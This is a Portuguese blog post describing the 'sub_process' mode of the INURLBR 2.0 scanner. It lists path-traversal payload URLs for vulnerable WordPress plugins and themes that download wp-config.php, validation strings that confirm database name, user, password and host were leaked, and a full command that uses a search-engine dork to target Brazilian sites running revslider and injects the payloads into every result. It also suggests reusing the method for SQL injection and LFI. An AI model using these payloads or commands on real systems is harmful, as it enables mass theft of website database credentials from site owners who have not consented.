quinta-feira, 9 de abril de 2015

CONCEITO DE SUB_PROCESS / SCANNER INURLBR 2.0

 SUB_PROCESS - Consiste em concatenar uma serie de strings com base de um arquivo predefinido.

 Consiste em concatenar uma serie de strings com base de um arquivo predefinido.

============================================================


[!] LISTA DE STRING'S QUE SERÁ EXECUTADA(concatenada) PRA CADA ALVO ENCONTRADO.

  1. ['LIST_XPL_NAME']: = listxpl_wordpress_afd.txt

Conteúdo arquivo - URL XPL Wordpress Vulnerability Arbitrary File Download:


  • /wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php
  • /wp-content/force-download.php?file=../wp-config.php
  • /wp-content/themes/acento/includes/view-pdf.php?download=1&file=/path/wp-config.php
  • /wp-content/themes/SMWF/inc/download.php?file=../wp-config.php
  • /wp-content/themes/markant/download.php?file=../../wp-config.php
  • /wp-content/themes/yakimabait/download.php?file=./wp-config.php
  • /wp-content/themes/TheLoft/download.php?file=../../../wp-config.php
  • /wp-content/themes/felis/download.php?file=../wp-config.php
  • /wp-content/themes/MichaelCanthony/download.php?file=../../../wp-config.php
  • /wp-content/themes/trinity/lib/scripts/download.php?file=../../../../../wp-config.php
  • /wp-content/themes/epic/includes/download.php?file=wp-config.php
  • /wp-content/themes/urbancity/lib/scripts/download.php?file=../../../../../wp-config.php
  • /wp-content/themes/antioch/lib/scripts/download.php?file=../../../../../wp-config.php
  • /wp-content/themes/authentic/includes/download.php?file=../../../../wp-config.php
  • /wp-content/themes/churchope/lib/downloadlink.php?file=../../../../wp-config.php
  • /wp-content/themes/lote27/download.php?download=../../../wp-config.php
  • /wp-content/themes/linenity/functions/download.php?imgurl=../../../../wp-config.php
  • /wp-content/plugins/ajax-store-locator-wordpress_0/sl_file_download.php?download_file=../../../wp-config.php
  • /wp-content/plugins/justified-image-grid/download.php?file=file:///C:/wamp/www/wp-config.php
  • /wp-content/plugins/justified-image-grid/download.php?file=file:///C:/xampp/htdocs/wp-config.php
  • /wp-content/plugins/justified-image-grid/download.php?file=file:///var/www/wp-config.php
  • /wp-content/plugins/aspose-doc-exporter/aspose_doc_exporter_download.php?file=../../../wp-config.php
  • /wp-content/plugins/aspose-cloud-ebook-generator/aspose_posts_exporter_download.php?file=../../../wp-config.php

--------------------------------------------------------------------------------------

[!] CMS WORDPRESS VALIDATION / INURLBR 2.0
 Já possui tal validação por padrão padrão interno.

  • ['CMS-WORDPRESS-01'] = "define('DB_NAME'";
  • ['CMS-WORDPRESS-02'] = "define('DB_USER'";
  • ['CMS-WORDPRESS-03'] = "define('DB_PASSWORD'";
  • ['CMS-WORDPRESS-04'] = "define('DB_HOST'";

--------------------------------------------------------------------------------------

 [!] Running subprocesses:
 
 --sub-file  Subprocess performs an injection 
     strings in URLs found by the engine, via GET or POST.
     Example: --sub-file {youfile}
     Usage:   --sub-file exploits_get.txt
         
 --sub-get defines whether the strings coming from 
     --sub-file will be injected via GET.
     Usage:   --sub-get
         
 --sub-post defines whether the strings coming from 
     --sub-file will be injected via POST.
     Usage:   --sub-get

[!] Descrição de comando usado:

  1. DEFINIR DORK:                       --dork 'DORK'
  2. DEFINIR ARQUIVO FONTE:  -s 'output.txt'
  3. DEFINIR DORK:                       --sub-file 'file_subprocess.txt'
  4. FLAG TIPO REQUEST:            --sub-get / FLAG
  5. FLAG FILTRO HOST:              --unique  / HOST ÚNICOS EM SEU RESULTADO


[!] COMMAND EXEC:
GO! GO! ~
php inurlbr.php --dork 'site:br "Index of /wp-content/plugins/revslider"' -s teste.txt --sub-file 'listxpl_wordpress_afd.txt' --sub-get --unique
--------------------------------------------------------------------------------------

CADA BARRINHA  QUE É DEMONSTRADA, É UM PROCESSO DE VALIDAÇÃO..
Dá mesma forma que usei uns (strings/urls)xpls Wordpress, pode ser usado de outros CMS's...
ou URL's padrões para tentar gerar erros SQLI no server, Ataques LFI dá mesma forma..

[!] VÍDEO DEMONSTRATIVO:

Baixar scanner INURLBR 2.0: 
https://github.com/googleinurl/SCANNER-INURLBR




[ Neither war between hackers, nor peace for the system. ]



Nenhum comentário:

Postar um comentário

............